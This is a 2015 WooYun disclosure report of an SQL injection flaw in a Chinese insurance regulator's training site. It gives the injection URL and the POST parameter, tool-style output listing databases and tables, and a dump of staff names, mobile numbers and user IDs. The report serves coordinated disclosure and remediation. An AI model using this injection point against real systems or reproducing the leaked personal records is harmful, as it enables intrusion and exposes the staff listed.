当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137043

漏洞标题:保监会某系统存在SQL注入漏洞可泄漏敏感数据(内部人员信息)

相关厂商:保监会

漏洞作者: 路人甲

提交时间:2015-08-28 11:33

修复时间:2015-10-12 16:26

公开时间:2015-10-12 16:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-28: 细节已通知厂商并且等待厂商处理中
2015-08-28: 厂商已经确认,细节仅向厂商公开
2015-09-07: 细节向核心白帽子及相关领域专家公开
2015-09-17: 细节向普通白帽子公开
2015-09-27: 细节向实习白帽子公开
2015-10-12: 细节向公众公开

简要描述:

证监会和保监会啥关系呢
dbo.EventLog | 432782
dbo.Users | 249
dbo.BRCB_User | 246
dbo.BRCB_Class_User_Record | 63

详细说明:

注入点
http://px.circ.gov.cn/tabid/95/Default.aspx
postdata
actionType=code&mobile=-1

1.gif


所有的数据库

available databases [22]:
[*] fcdb
[*] km15b
[*] km_14
[*] km_15
[*] km_bjh
[*] km_gdym
[*] km_lhsz
[*] master
[*] meisizixun
[*] model
[*] msdb
[*] pfps
[*] pfps_cuspro
[*] pfps_customer
[*] pfps_plan
[*] pfpsata
[*] pfpsproduct
[*] tempdb
[*] water_crm
[*] waterh2_py
[*] ygbx
[*] zhongmeizhihui


当前库的表及数量

2.gif


user信息

a.gif


漏洞证明:

Table: BRCB_User

+------+----------------+-------+-------------+--------+---------+----------+
| Name | Email | State | Mobile | Gender | Address | UserName |
+------+----------------+-------+-------------+--------+---------+----------+
| 路秀丽 | [email protected] | 4 | 15888887778 | 1 | <blank> | 002877
| 申书海 | [email protected] | 4 | 15888887779 | 0 | + | 002878
| 李三喜 | [email protected] | 4 | 15888887780 | 0 | + | 002879
| 陈秀娟 | [email protected] | 4 | 15888887781 | 1 | + | 002880
| 李淑会 | [email protected] | 4 | 15888887782 | 1 | + | 002881
| 周卿 | [email protected] | 4 | 15888887783 | 0 | + | 002882
| 沈琦 | [email protected] | 4 | 15888887784 | 1 | + | 002883
| 程康平 | [email protected] | 4 | 15888887785 | 0 | + | 002884
+------+----------------+-------+-------------+--------+---------+----------+


loginfo

b.gif

修复方案:

对mobile参数的特殊字符过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-08-28 16:25

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置。

最新状态:

暂无